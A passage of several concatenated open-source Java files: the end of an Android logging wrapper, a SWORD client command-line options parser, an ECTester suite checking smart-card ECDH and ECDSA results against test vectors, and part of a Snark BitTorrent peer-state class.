listener) { if (!listeners.contains(listener)) listeners.add(listener); } public static synchronized void unregisterLogListener(LogListener listener) { listeners.remove(listener); } private static void notifyListeners(LogLevel level, boolean debugMode, String tag, String text, String callingInfo) { if (listeners != null) { for (LogListener ll : listeners) ll.logActivated(level, debugMode, tag, text, callingInfo); } } private static void notifyListeners(LogLevel level, boolean debugMode, String tag, String text, String callingInfo, Throwable e) { if (listeners != null) { for (LogListener ll : listeners) ll.logActivated(level, debugMode, tag, text, callingInfo, e); } } public static void d(String tag, String txt) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.DEBUG, DebugMode, tag, txt, callingInfo); if (DebugMode) android.util.Log.d(tag, txt + callingInfo); } public static void d(String tag, String txt, Throwable e) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.DEBUG, DebugMode, tag, txt, callingInfo, e); if (DebugMode) android.util.Log.d(tag, txt + callingInfo, e); } public static void e(String tag, String txt) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.ERROR, DebugMode, tag, txt, callingInfo); if (DebugMode) android.util.Log.e(tag, txt + callingInfo); } public static void e(String tag, String txt, Throwable e) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.ERROR, DebugMode, tag, txt, callingInfo, e); if (DebugMode) android.util.Log.e(tag, txt + callingInfo, e); } public static String getStackTraceString(Throwable e) { return android.util.Log.getStackTraceString(e); } public static void i(String tag, String txt) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.INFO, DebugMode, tag, txt, callingInfo); if (DebugMode) android.util.Log.i(tag, txt + callingInfo); } public static void i(String tag, String txt, Throwable e) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.INFO, DebugMode, tag, txt, callingInfo, e); if (DebugMode) android.util.Log.i(tag, txt + callingInfo, e); } public static boolean isLoggable(String tag, int lvl) { return DebugMode && android.util.Log.isLoggable(tag, lvl); } public static void println(int lvl, String tag, String txt) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.INFO, DebugMode, tag, txt, callingInfo); if (DebugMode) android.util.Log.println(lvl, tag, txt + callingInfo); } public static void v(String tag, String txt) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.VERBOSE, DebugMode, tag, txt, callingInfo); if (DebugMode) android.util.Log.v(tag, txt + callingInfo); } public static void v(String tag, String txt, Throwable e) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.VERBOSE, DebugMode, tag, txt, callingInfo, e); if (DebugMode) android.util.Log.v(tag, txt + callingInfo, e); } public static void w(String tag, String txt) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.WARN, DebugMode, tag, txt, callingInfo); if (DebugMode) android.util.Log.w(tag, txt + callingInfo); } public static void w(String tag, String txt, Throwable e) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.WARN, DebugMode, tag, txt, callingInfo, e); if (DebugMode) android.util.Log.w(tag, txt + callingInfo, e); } public static void w(String tag, Throwable e) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.WARN, DebugMode, tag, "", callingInfo, e); if (DebugMode) android.util.Log.w(tag, e); } public static void wtf(String tag, String txt) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.WTF, DebugMode, tag, txt, callingInfo); if (DebugMode) android.util.Log.wtf(tag, txt + callingInfo); } public static void wtf(String tag, String txt, Throwable e) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.WTF, DebugMode, tag, txt, callingInfo, e); if (DebugMode) android.util.Log.wtf(tag, txt + callingInfo, e); } public static void wtf(String tag, Throwable e) { String callingInfo = getCallingInfo(); notifyListeners(LogLevel.WTF, DebugMode, tag, "", callingInfo, e); if (DebugMode) android.util.Log.wtf(tag, e); } }
/** * The contents of this file are subject to the license and copyright * detailed in the LICENSE and NOTICE files at the root of the source * tree and available online at * * http://www.dspace.org/license/ */ package org.purl.sword.client; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.regex.Matcher; import java.util.regex.Pattern; import org.apache.log4j.Logger; /** * List of options that are parsed from the command line. * @author Neil Taylor */ public class ClientOptions { /** * Label for the service operation. */ public static final String TYPE_SERVICE = "service"; /** * Label for the post operation. */ public static final String TYPE_POST = "post"; /** * Label for the multipost operation. */ public static final String TYPE_MULTI_POST = "multipost"; /** * The access type. */ private String accessType = null; /** * Proxy host name. */ private String proxyHost = null; /** * Proxy host port. */ private int proxyPort = 8080; /** * Username to access the service/post server. */ private String username = null; /** * Password to access the service/post server. */ private String password = null; /** * HREF of the server to access. */ private String href = null; /** * Filename to post. */ private String filename = null; /** * Filetype. */ private String filetype = null; /** * Specifies that the output streams are not to be captured by the GUI client. */ private boolean noCapture = false; /** * SLUG Header field. */ private String slug = null; /** * NoOp, used to indicate an operation on the server that does not * require the file to be stored. */ private boolean noOp = false; /** * Request verbose output from the server. */ private boolean verbose = false; /** * OnBehalfOf user id. */ private String onBehalfOf = null; /** * Format namespace to be used for the posted file. */ private String formatNamespace = null; /** * Introduce a checksum error. This is used to simualte an error with the * MD5 value. */ private boolean checksumError = false; /** * Logger. */ private static Logger log = Logger.getLogger(ClientOptions.class); /** * List of multiple destination items. Used if the mode is set to multipost. */ private List<PostDestination> multiPost = new ArrayList<PostDestination>(); /** * Pattern string to extract the data from a destination parameter in multipost mode. */ private static final Pattern multiPattern = Pattern.compile("(.*?)(\\[(.*?)\\]){0,1}(:(.*)){0,1}@(http://.*)"); /** * Flag that indicates if the gui mode has been set. This is * true by default. */ private boolean guiMode = true; /** * Flat that indicates if the MD5 option has been selected. This * is true by default. */ private boolean md5 = false; /** * Parse the list of options contained in the specified array. * * @param args The array of options. * * @return True if the options were parsed successfully. */ public boolean parseOptions( String[] args ) { try { // iterate over the args for( int i = 0; i < args.length; i++ ) { if( "-md5".equals(args[i])) { md5 = true; } if( "-noOp".equals(args[i])) { noOp = true; } if( "-verbose".equals(args[i])) { verbose = true; } if( "-cmd".equals(args[i]) ) { guiMode = false; } if( "-gui".equals(args[i]) ) { guiMode = true; } if( "-host".equals(args[i]) ) { i++; proxyHost = args[i]; } if( "-port".equals(args[i]) ) { i++; proxyPort = Integer.parseInt(args[i]); } if( "-u".equals(args[i]) ) { i++; username = args[i]; } if( "-p".equals(args[i])) { i++; password = args[i]; } if( "-href".equals(args[i])) { i++; href = args[i]; } if( "-help".equals(args[i]) ) { // force the calling code to display the usage information return false; } if( "-t".equals(args[i])) { i++; accessType = args[i]; } if( "-file".equals(args[i])) { i++; filename = args[i]; } if( "-filetype".equals(args[i])) { i++; filetype = args[i]; } if( "-slug".equals(args[i])) { i++; slug = args[i]; } if( "-onBehalfOf".equals(args[i])) { i++; onBehalfOf = args[i]; } if( "-formatNamespace".equals(args[i])) { i++; formatNamespace = args[i]; } if( "-checksumError".equals(args[i])) { i++; checksumError = true; } if( "-dest".equals(args[i])) { i++; Matcher m = multiPattern.matcher(args[i]); if( ! m.matches() ) { log.debug("Error with dest parameter. Ignoring value: " + args[i]); } else { int numGroups = m.groupCount(); for( int g = 0; g <= numGroups; g++ ) { log.debug("Group (" + g + ") is: " + m.group(g)); } String username = m.group(1); String onBehalfOf = m.group(3); String password = m.group(5); String url = m.group(6); PostDestination destination = new PostDestination(url, username, password, onBehalfOf); multiPost.add(destination); } } if( "-nocapture".equals(args[i]) ) { i++; noCapture = true; } } // apply any settings if( href == null && "service".equals(accessType) ) { log.error( "No href specified."); return false; } if( multiPost.size() == 0 && "multipost".equals(accessType)) { log.error("No destinations specified"); return false; } if( accessType == null && ! guiMode ) { log.error("No access type specified"); return false; } if( ( username == null && password != null ) || (username != null && password == null)) { log.error("The username and/or password are not specified. If one is specified, the other must also be specified."); return false; } } catch( ArrayIndexOutOfBoundsException ex ) { log.error("Error with parameters."); return false; } return true; } /** * Get the access type. * @return The value, or <code>null</code> if the value is not set. */ public String getAccessType() { return accessType; } /** * Set the access type. * @param accessType The value, or <code>null</code> to clear the value. */ public void setAccessType(String accessType) { this.accessType = accessType; } /** * Get the proxy host. * @return The value, or <code>null</code> if the value is not set. */ public String getProxyHost() { return proxyHost; } /** * Set the proxy host. * @param proxyHost The value, or <code>null</code> to clear the value. */ public void setProxyHost(String proxyHost) { this.proxyHost = proxyHost; } /** * Get the proxy port. * @return The proxy port. Default value is 80. */ public int getProxyPort() { return proxyPort; } /** * Set the proxy port. * @param proxyPort The proxy port. */ public void setProxyPort(int proxyPort) { this.proxyPort = proxyPort; } /** * Get the username. * @return The value, or <code>null</code> if the value is not set. */ public String getUsername() { return username; } /** * Set the username. * @param username The value, or <code>null</code> to clear the value. */ public void setUsername(String username) { this.username = username; } /** * Get the password. * @return The value, or <code>null</code> if the value is not set. */ public String getPassword() { return password; } /** * Set the password. * @param password The value, or <code>null</code> to clear the value. */ public void setPassword(String password) { this.password = password; } /** * Get the HREF of the service to access. * @return The value, or <code>null</code> if the value is not set. */ public String getHref() { return href; } /** * Set the HREF of the service to access. * @param href The value, or <code>null</code> to clear the value. */ public void setHref(String href) { this.href = href; } /** * Get the name of the file to post. * @return The value, or <code>null</code> if the value is not set. */ public String getFilename() { return filename; } /** * Set the name of the file to post. * @param filename The value, or <code>null</code> to clear the value. */ public void setFilename(String filename) { this.filename = filename; } /** * Get the type of the file to post. * @return The filetype, or <code>null</code> if the value is not set. */ public String getFiletype() { return filetype; } /** * Set the type of the file to post. * @param filetype The value, or <code>null</code> to clear the value. */ public void setFiletype(String filetype) { this.filetype = filetype; } /** * Determine if the tool is to be run in GUI mode. * @return True if the tool is set for GUI mode. */ public boolean isGuiMode() { return guiMode; } /** * Set the tool to run in GUI mode. * @param guiMode True if the tool is to run in gui mode. */ public void setGuiMode(boolean guiMode) { this.guiMode = guiMode; } /** * Get the MD5 setting. True if the tool is to use MD5 for post operations. * @return The MD5 setting. */ public boolean isMd5() { return md5; } /** * Set the MD5 setting. * @param md5 True if the tool should use MD5 for post operations. */ public void setMd5(boolean md5) { this.md5 = md5; } /** * Determine if the NoOp header should be sent. * @return True if the header should be sent. */ public boolean isNoOp() { return noOp; } /** * Set the NoOp setting. * @param noOp True if the NoOp header should be used. */ public void setNoOp(boolean noOp) { this.noOp = noOp; } /** * Determine if the verbose option is set. * @return True if verbose option is set. */ public boolean isVerbose() { return verbose; } /** * Set the verbose option. * @param verbose True if verbose should be set. */ public void setVerbose(boolean verbose) { this.verbose = verbose; } /** * Get the onBehalfOf value. * @return The value, or <code>null</code> to clear the value. */ public String getOnBehalfOf() { return onBehalfOf; } /** * Set the onBehalf of Value. * @param onBehalfOf The value, or <code>null</code> to clear the value. */ public void setOnBehalfOf(String onBehalfOf) { this.onBehalfOf = onBehalfOf; } /** * Get the format namespace value. * @return The value, or <code>null</code> if the value is not set. */ public String getFormatNamespace() { return formatNamespace; } /** * Set the format namespace value. * @param formatNamespace The value, or <code>null</code> to clear the value. */ public void setFormatNamespace(String formatNamespace) { this.formatNamespace = formatNamespace; } /** * Get the checksum error value. * @return True if an error should be introduced into the checksum. */ public boolean getChecksumError() { return checksumError; } /** * Set the checksum error value. * @param checksumError True if the error should be introduced. */ public void setChecksumError(boolean checksumError) { this.checksumError = checksumError; } /** * Get the current slug header. * @return The slug value, or <code>null</code> if the value is not set. */ public String getSlug( ) { return this.slug; } /** * Set the text that is to be used for the slug header. * @param slug The value, or <code>null</code> to clear the value. */ public void setSlug(String slug) { this.slug = slug; } /** * Get the list of post destinations. * @return An iterator over the list of PostDestination objects. */ public Iterator<PostDestination> getMultiPost() { return multiPost.iterator(); } /** * Determine if the noCapture option is set. This indicates that the code * should not attempt to redirect stdout and stderr to a different output * destination. Intended for use in a GUI client. * * @return The noCapture setting. True if set. */ public boolean isNoCapture() { return noCapture; } }
package cz.crcs.ectester.reader.test; import cz.crcs.ectester.applet.ECTesterApplet; import cz.crcs.ectester.applet.EC_Consts; import cz.crcs.ectester.common.ec.*; import cz.crcs.ectester.common.output.TestWriter; import cz.crcs.ectester.common.test.CompoundTest; import cz.crcs.ectester.common.test.Result; import cz.crcs.ectester.common.test.Test; import cz.crcs.ectester.common.test.TestCallback; import cz.crcs.ectester.common.util.ByteUtil; import cz.crcs.ectester.common.util.CardUtil; import cz.crcs.ectester.common.util.ECUtil; import cz.crcs.ectester.data.EC_Store; import cz.crcs.ectester.reader.CardMngr; import cz.crcs.ectester.reader.ECTesterReader; import cz.crcs.ectester.reader.command.Command; import cz.crcs.ectester.reader.response.Response; import javacard.security.KeyPair; import javax.crypto.KeyAgreement; import java.io.IOException; import java.math.BigInteger; import java.security.*; import java.security.spec.ECParameterSpec; import java.security.spec.ECPrivateKeySpec; import java.security.spec.ECPublicKeySpec; import java.security.spec.InvalidKeySpecException; import java.util.ArrayList; import java.util.LinkedList; import java.util.List; import java.util.Map; import java.util.function.BiFunction; import java.util.stream.Collectors; import static cz.crcs.ectester.common.test.Result.ExpectedValue; import static cz.crcs.ectester.common.test.Result.Value; /** * @author Jan Jancar johny@neuromancer.sk */ public class CardTestVectorSuite extends CardTestSuite { public CardTestVectorSuite(TestWriter writer, ECTesterReader.Config cfg, CardMngr cardManager) { super(writer, cfg, cardManager, "test-vectors", null, "The test-vectors suite contains a collection of test vectors which test basic ECDH correctness."); } @Override protected void runTests() throws Exception { /* Set original curves (secg/nist/brainpool). Set keypairs from test vectors. * Do ECDH both ways, export and verify that the result is correct. */ Map<String, EC_KAResult> results = EC_Store.getInstance().getObjects(EC_KAResult.class, "test"); for (EC_KAResult result : results.values()) { EC_Curve curve = EC_Store.getInstance().getObject(EC_Curve.class, result.getCurve()); EC_Params onekey = EC_Store.getInstance().getObject(EC_Keypair.class, result.getOneKey()); if (onekey == null) { onekey = EC_Store.getInstance().getObject(EC_Key.Private.class, result.getOneKey()); } EC_Params otherkey = EC_Store.getInstance().getObject(EC_Keypair.class, result.getOtherKey()); if (otherkey == null) { otherkey = EC_Store.getInstance().getObject(EC_Key.Public.class, result.getOtherKey()); } if (onekey == null || otherkey == null) { throw new IOException("Test vector keys couldn't be located."); } List<Test> testVector = new LinkedList<>(); Test allocate = runTest(CommandTest.expect(new Command.Allocate(this.card, ECTesterApplet.KEYPAIR_BOTH, curve.getBits(), curve.getField()), ExpectedValue.SUCCESS)); if (!allocate.ok()) { doTest(CompoundTest.all(ExpectedValue.SUCCESS, "No support for " + curve.getBits() + "b " + CardUtil.getKeyTypeString(curve.getField()) + ".", allocate)); continue; } testVector.add(allocate); testVector.add(CommandTest.expect(new Command.Set(this.card, ECTesterApplet.KEYPAIR_BOTH, EC_Consts.CURVE_external, curve.getParams(), curve.flatten()), ExpectedValue.SUCCESS)); testVector.add(CommandTest.expect(new Command.Set(this.card, ECTesterApplet.KEYPAIR_LOCAL, EC_Consts.CURVE_external, EC_Consts.PARAMETER_S, onekey.flatten(EC_Consts.PARAMETER_S)), ExpectedValue.SUCCESS)); testVector.add(CommandTest.expect(new Command.Set(this.card, ECTesterApplet.KEYPAIR_REMOTE, EC_Consts.CURVE_external, EC_Consts.PARAMETER_W, otherkey.flatten(EC_Consts.PARAMETER_W)), ExpectedValue.SUCCESS)); testVector.add(CommandTest.function(new Command.ECDH(this.card, ECTesterApplet.KEYPAIR_REMOTE, ECTesterApplet.KEYPAIR_LOCAL, ECTesterApplet.EXPORT_TRUE, EC_Consts.TRANSFORMATION_NONE, result.getJavaCardKA()), new TestCallback<CommandTestable>() { @Override public Result apply(CommandTestable testable) { Response.ECDH dh = (Response.ECDH) testable.getResponse(); if (!dh.successful()) return new Result(Value.FAILURE, "ECDH was unsuccessful."); if (!dh.hasSecret()) return new Result(Value.FAILURE, "ECDH response did not contain the derived secret."); if (!ByteUtil.compareBytes(dh.getSecret(), 0, result.getData(0), 0, dh.secretLength())) { int firstDiff = ByteUtil.diffBytes(dh.getSecret(), 0, result.getData(0), 0, dh.secretLength()); return new Result(Value.FAILURE, "ECDH derived secret does not match the test-vector, first difference was at byte " + firstDiff + "."); } return new Result(Value.SUCCESS); } })); if (cfg.cleanup) { testVector.add(CommandTest.expect(new Command.Cleanup(this.card), ExpectedValue.ANY)); } doTest(CompoundTest.greedyAll(ExpectedValue.SUCCESS, "Test vector " + result.getId() + ".", testVector.toArray(new Test[0]))); } KeyAgreement ka; Signature sig; KeyFactory kf; MessageDigest md; try { ka = KeyAgreement.getInstance("ECDH", "BC"); sig = Signature.getInstance("ECDSAwithSHA1", "BC"); kf = KeyFactory.getInstance("ECDH", "BC"); md = MessageDigest.getInstance("SHA1", "BC"); } catch (NoSuchAlgorithmException | NoSuchProviderException ex) { return; } List<EC_Curve> testCurves = new ArrayList<>(); testCurves.addAll(EC_Store.getInstance().getObjects(EC_Curve.class, "secg").values().stream().filter((curve) -> curve.getField() == KeyPair.ALG_EC_FP).collect(Collectors.toList())); testCurves.addAll(EC_Store.getInstance().getObjects(EC_Curve.class, "brainpool").values().stream().filter((curve) -> curve.getField() == KeyPair.ALG_EC_FP).collect(Collectors.toList())); for (EC_Curve curve : testCurves) { List<Test> testVector = new LinkedList<>(); Test allocate = runTest(CommandTest.expect(new Command.Allocate(this.card, ECTesterApplet.KEYPAIR_BOTH, curve.getBits(), curve.getField()), ExpectedValue.SUCCESS)); if (!allocate.ok()) { doTest(CompoundTest.all(ExpectedValue.SUCCESS, "No support for " + curve.getBits() + "b " + CardUtil.getKeyTypeString(curve.getField()) + ".", allocate)); continue; } testVector.add(allocate); testVector.add(CommandTest.expect(new Command.Set(this.card, ECTesterApplet.KEYPAIR_BOTH, EC_Consts.CURVE_external, curve.getParams(), curve.flatten()), ExpectedValue.SUCCESS)); testVector.add(CommandTest.expect(new Command.Generate(this.card, ECTesterApplet.KEYPAIR_BOTH), ExpectedValue.SUCCESS)); CommandTest exportLocal = CommandTest.expect(new Command.Export(this.card, ECTesterApplet.KEYPAIR_LOCAL, EC_Consts.KEY_PUBLIC, EC_Consts.PARAMETER_W), ExpectedValue.ANY); CommandTest exportRemote = CommandTest.expect(new Command.Export(this.card, ECTesterApplet.KEYPAIR_REMOTE, EC_Consts.KEY_PRIVATE, EC_Consts.PARAMETER_S), ExpectedValue.ANY); testVector.add(exportLocal); testVector.add(exportRemote); BiFunction<Response.Export, Response.Export, Key[]> getKeys = (localData, remoteData) -> { byte[] pkey = localData.getParameter(ECTesterApplet.KEYPAIR_LOCAL, EC_Consts.PARAMETER_W); byte[] skey = remoteData.getParameter(ECTesterApplet.KEYPAIR_REMOTE, EC_Consts.PARAMETER_S); ECParameterSpec spec = curve.toSpec(); ECPrivateKeySpec privKeySpec = new ECPrivateKeySpec(new BigInteger(1, skey), spec); ECPublicKeySpec pubKeySpec = new ECPublicKeySpec(ECUtil.fromX962(pkey, curve.toCurve()), spec); PrivateKey privKey; PublicKey pubKey; try { privKey = kf.generatePrivate(privKeySpec); pubKey = kf.generatePublic(pubKeySpec); } catch (InvalidKeySpecException ex) { return null; } return new Key[]{privKey, pubKey}; }; TestCallback<CommandTestable> kaCallback = new TestCallback<CommandTestable>() { @Override public Result apply(CommandTestable testable) { Response.ECDH ecdhData = (Response.ECDH) testable.getResponse(); if (!ecdhData.successful()) return new Result(Value.FAILURE, "ECDH was unsuccessful."); if (!ecdhData.hasSecret()) { return new Result(Value.FAILURE, "ECDH response did not contain the derived secret."); } byte[] secret = ecdhData.getSecret(); Response.Export localData = (Response.Export) exportLocal.getResponse(); Response.Export remoteData = (Response.Export) exportRemote.getResponse(); Key[] keys = getKeys.apply(localData, remoteData); if (keys == null) { return new Result(Value.SUCCESS, "Result could not be verified. keyData unavailable."); } PrivateKey privKey = (PrivateKey) keys[0]; PublicKey pubKey = (PublicKey) keys[1]; try { ka.init(privKey); ka.doPhase(pubKey, true); byte[] derived = ka.generateSecret(); int fieldSize = (curve.getBits() + 7) / 8; if (derived.length < fieldSize) { byte[] padded = new byte[fieldSize]; System.arraycopy(derived, 0, padded, fieldSize - derived.length, derived.length); derived = padded; } if (ecdhData.getType() == EC_Consts.KeyAgreement_ALG_EC_SVDP_DH || ecdhData.getType() == EC_Consts.KeyAgreement_ALG_EC_SVDP_DHC) { derived = md.digest(derived); } if (secret.length != derived.length) { if (secret.length < derived.length) { return new Result(Value.FAILURE, String.format("Derived secret was shorter than expected: %d vs %d (expected).", secret.length, derived.length)); } else { return new Result(Value.FAILURE, String.format("Derived secret was longer than expected: %d vs %d (expected).", secret.length, derived.length)); } } int diff = ByteUtil.diffBytes(derived, 0, secret, 0, secret.length); if (diff == secret.length) { return new Result(Value.SUCCESS, "Derived secret matched expected value."); } else { return new Result(Value.FAILURE, "Derived secret does not match expected value, first difference was at byte " + diff + "."); } } catch (InvalidKeyException ex) { return new Result(Value.SUCCESS, "Result could not be verified. " + ex.getMessage()); } } }; Test ecdhTest = CommandTest.function(new Command.ECDH(this.card, ECTesterApplet.KEYPAIR_LOCAL, ECTesterApplet.KEYPAIR_REMOTE, ECTesterApplet.EXPORT_TRUE, EC_Consts.TRANSFORMATION_NONE, EC_Consts.KeyAgreement_ALG_EC_SVDP_DH), kaCallback); Test ecdhRawTest = CommandTest.function(new Command.ECDH(this.card, ECTesterApplet.KEYPAIR_LOCAL, ECTesterApplet.KEYPAIR_REMOTE, ECTesterApplet.EXPORT_TRUE, EC_Consts.TRANSFORMATION_NONE, EC_Consts.KeyAgreement_ALG_EC_SVDP_DH_PLAIN), kaCallback); byte[] data = new byte[32]; TestCallback<CommandTestable> sigCallback = new TestCallback<CommandTestable>() { @Override public Result apply(CommandTestable testable) { Response.ECDSA ecdsaData = (Response.ECDSA) testable.getResponse(); if (!ecdsaData.successful()) return new Result(Value.FAILURE, "ECDSA was unsuccessful."); if (!ecdsaData.hasSignature()) { return new Result(Value.FAILURE, "ECDSA response did not contain the signature."); } byte[] signature = ecdsaData.getSignature(); Response.Export localData = (Response.Export) exportLocal.getResponse(); Response.Export remoteData = (Response.Export) exportRemote.getResponse(); Key[] keys = getKeys.apply(localData, remoteData); if (keys == null) { return new Result(Value.SUCCESS, "Result could not be verified. keyData unavailable."); } PublicKey pubKey = (PublicKey) keys[1]; try { sig.initVerify(pubKey); sig.update(data); if (sig.verify(signature)) { return new Result(Value.SUCCESS, "Signature verified."); } else { return new Result(Value.FAILURE, "Signature failed to verify."); } } catch (InvalidKeyException | SignatureException ex) { return new Result(Value.SUCCESS, "Result could not be verified. " + ex.getMessage()); } } }; Test ecdsaTest = CommandTest.function(new Command.ECDSA_sign(this.card, ECTesterApplet.KEYPAIR_LOCAL, EC_Consts.Signature_ALG_ECDSA_SHA, ECTesterApplet.EXPORT_TRUE, data), sigCallback); testVector.add(CompoundTest.all(ExpectedValue.SUCCESS, "Test.", ecdhTest, ecdhRawTest, ecdsaTest)); if (cfg.cleanup) { testVector.add(CommandTest.expect(new Command.Cleanup(this.card), ExpectedValue.ANY)); } doTest(CompoundTest.greedyAll(ExpectedValue.SUCCESS, "Validation test on " + curve.getId() + ".", testVector.toArray(new Test[0]))); } } }
/* PeerState - Keeps track of the Peer state through connection callbacks. Copyright (C) 2003 Mark J. Wielaard This file is part of Snark. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ package org.klomp.snark; import java.util.ArrayList; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Set; import net.i2p.I2PAppContext; import net.i2p.data.ByteArray; import net.i2p.util.Log; class PeerState implements DataLoader { private final Log _log = I2PAppContext.getGlobalContext().logManager().getLog(PeerState.class); private final Peer peer; /** Fixme, used by Peer.disconnect() to get to the coordinator */ final PeerListener listener; private MetaInfo metainfo; // Interesting and choking describes whether we are interested in or // are choking the other side. volatile boolean interesting; volatile boolean choking = true; // Interested and choked describes whether the other side is // interested in us or choked us. volatile boolean interested; volatile boolean choked = true; /** the pieces the peer has */ BitField bitfield; // Package local for use by Peer. final PeerConnectionIn in; final PeerConnectionOut out; // Outstanding request private final List<Request> outstandingRequests = new ArrayList<Request>(); /** the tail (NOT the head) of the request queue */ private Request lastRequest = null; // FIXME if piece size < PARTSIZE, pipeline could be bigger private final static int MAX_PIPELINE = 5; // this is for outbound requests private final static int MAX_PIPELINE_BYTES = 128*1024; // this is for inbound requests public final static int PARTSIZE = 16*1024; // outbound request private final static int MAX_PARTSIZE = 64*1024; // Don't let anybody request more than this /** * @param metainfo null if in magnet mode */ PeerState(Peer peer, PeerListener listener, MetaInfo metainfo, PeerConnectionIn in, PeerConnectionOut out) { this.peer = peer; this.listener = listener; this.metainfo = metainfo; this.in = in; this.out = out; } // NOTE Methods that inspect or change the state synchronize (on this). void keepAliveMessage() { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv alive"); /* XXX - ignored */ } void chokeMessage(boolean choke) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv " + (choke ? "" : "un") + "choked"); boolean resend = choked && !choke; choked = choke; listener.gotChoke(peer, choke); if (interesting && !choked) request(resend); if (choked) { out.cancelRequestMessages(); // old Roberts thrash us here, choke+unchoke right together // The only problem with returning the partials to the coordinator // is that chunks above a missing request are lost. // Future enhancements to PartialPiece could keep track of the holes. List<Request> pcs = returnPartialPieces(); if (!pcs.isEmpty()) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " got choked, returning partial pieces to the PeerCoordinator: " + pcs); listener.savePartialPieces(this.peer, pcs); } } } void interestedMessage(boolean interest) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv " + (interest ? "" : "un") + "interested"); interested = interest; listener.gotInterest(peer, interest); } void haveMessage(int piece) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv have(" + piece + ")"); // FIXME we will lose these until we get the metainfo if (metainfo == null) return; // Sanity check if (piece < 0 || piece >= metainfo.getPieces()) { // XXX disconnect? if (_log.shouldLog(Log.WARN)) _log.warn("Got strange 'have: " + piece + "' message from " + peer); return; } synchronized(this) { // Can happen if the other side never send a bitfield message. if (bitfield == null) bitfield = new BitField(metainfo.getPieces()); bitfield.set(piece); } if (listener.gotHave(peer, piece)) setInteresting(true); } void bitfieldMessage(byte[] bitmap) { synchronized(this) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv bitfield"); if (bitfield != null) { // XXX - Be liberal in what you except? if (_log.shouldLog(Log.WARN)) _log.warn("Got unexpected bitfield message from " + peer); return; } // XXX - Check for weird bitfield and disconnect? // FIXME will have to regenerate the bitfield after we know exactly // how many pieces there are, as we don't know how many spare bits there are. if (metainfo == null) bitfield = new BitField(bitmap, bitmap.length * 8); else bitfield = new BitField(bitmap, metainfo.getPieces()); } if (metainfo == null) return; boolean interest = listener.gotBitField(peer, bitfield); setInteresting(interest); if (bitfield.complete() && !interest) { // They are seeding and we are seeding, // why did they contact us? (robert) // Dump them quick before we send our whole bitmap if (_log.shouldLog(Log.WARN)) _log.warn("Disconnecting seed that connects to seeds: " + peer); peer.disconnect(true); } } void requestMessage(int piece, int begin, int length) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv request(" + piece + ", " + begin + ", " + length + ") "); if (metainfo == null) return; if (choking) { if (_log.shouldLog(Log.INFO)) _log.info("Request received, but choking " + peer); return; } // Sanity check if (piece < 0 || piece >= metainfo.getPieces() || begin < 0 || begin > metainfo.getPieceLength(piece) || length <= 0 || length > MAX_PARTSIZE) { // XXX - Protocol error -> disconnect? if (_log.shouldLog(Log.WARN)) _log.warn("Got strange 'request: " + piece + ", " + begin + ", " + length + "' message from " + peer); return; } // Limit total pipelined requests to MAX_PIPELINE bytes // to conserve memory and prevent DOS // Todo: limit number of requests also? (robert 64 x 4KB) if (out.queuedBytes() + length > MAX_PIPELINE_BYTES) { if (_log.shouldLog(Log.WARN)) _log.warn("Discarding request over pipeline limit from " + peer); return; } if (_log.shouldLog(Log.DEBUG)) _log.debug("Queueing (" + piece + ", " + begin + ", " + length + ")" + " to " + peer); // don't load the data into mem now, let PeerConnectionOut do it out.sendPiece(piece, begin, length, this); } /** * This is the callback that PeerConnectionOut calls * * @return bytes or null for errors * @since 0.8.2 */ public ByteArray loadData(int piece, int begin, int length) { ByteArray pieceBytes = listener.gotRequest(peer, piece, begin, length); if (pieceBytes == null) { // XXX - Protocol error-> diconnect? if (_log.shouldLog(Log.WARN)) _log.warn("Got request for unknown piece: " + piece); return null; } // More sanity checks if (length != pieceBytes.getData().length) { // XXX - Protocol error-> disconnect? if (_log.shouldLog(Log.WARN)) _log.warn("Got out of range 'request: " + piece + ", " + begin + ", " + length + "' message from " + peer); return null; } if (_log.shouldLog(Log.DEBUG)) _log.debug("Sending (" + piece + ", " + begin + ", " + length + ")" + " to " + peer); return pieceBytes; } /** * Called when some bytes have left the outgoing connection. * XXX - Should indicate whether it was a real piece or overhead. */ void uploaded(int size) { peer.uploaded(size); listener.uploaded(peer, size); } // This is used to flag that we have to back up from the firstOutstandingRequest // when calculating how far we've gotten private Request pendingRequest; /** * Called when a full chunk (i.e. a piece message) has been received by * PeerConnectionIn. * * This may block quite a while if it is the last chunk for a piece, * as it calls the listener, who stores the piece and then calls * havePiece for every peer on the torrent (including us). * */ void pieceMessage(Request req) { int size = req.len; peer.downloaded(size); listener.downloaded(peer, size); if (_log.shouldLog(Log.DEBUG)) _log.debug("got end of Chunk(" + req.getPiece() + "," + req.off + "," + req.len + ") from " + peer); // Last chunk needed for this piece? // FIXME if priority changed to skip, we will think we're done when we aren't if (getFirstOutstandingRequest(req.getPiece()) == -1) { // warning - may block here for a while if (listener.gotPiece(peer, req.getPartialPiece())) { if (_log.shouldLog(Log.DEBUG)) _log.debug("Got " + req.getPiece() + ": " 